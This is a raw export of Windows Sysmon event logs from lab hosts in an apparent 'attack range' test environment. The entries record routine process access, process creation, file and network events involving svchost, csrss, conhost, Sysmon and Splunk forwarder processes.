11:32:19.690{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300300Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:19.690{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300299Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:19.690{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-1B43-6216-9E07-000000003802}4172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000300298Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:19.690{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1B43-6216-9E07-000000003802}4172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000300297Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:19.695{C8EA50B7-1B43-6216-9E07-000000003802}4172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000300296Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:19.522{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-175MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000300295Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:19.342{C8EA50B7-1B43-6216-9D07-000000003802}61526444C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300294Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:19.042{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1B43-6216-9D07-000000003802}6152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300293Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:19.042{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300292Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:19.042{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300291Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:19.042{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300290Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:19.042{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300289Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:19.042{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-1B43-6216-9D07-000000003802}6152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000300288Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:19.042{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1B43-6216-9D07-000000003802}6152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000300287Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:19.043{C8EA50B7-1B43-6216-9D07-000000003802}6152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000224070Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:20.784{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1B136C5FE5C8EA2DB1C009720DA49E9,SHA256=BC0D21D10ECD8B595974AC4E9B9A925F53918C782D9015565973D1250B807728,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000300325Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:20.874{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1B44-6216-A007-000000003802}2960C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300324Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:20.874{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300323Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:20.874{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300322Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:20.874{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300321Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:20.874{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300320Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:20.874{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-1B44-6216-A007-000000003802}2960C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000300319Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:20.874{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1B44-6216-A007-000000003802}2960C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000300318Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:20.875{C8EA50B7-1B44-6216-A007-000000003802}2960C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000300317Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:18.678{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49714-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000300316Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:20.443{C8EA50B7-1B44-6216-9F07-000000003802}70806748C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300315Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:20.206{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1B44-6216-9F07-000000003802}7080C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300314Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:20.206{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300313Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:20.206{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300312Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 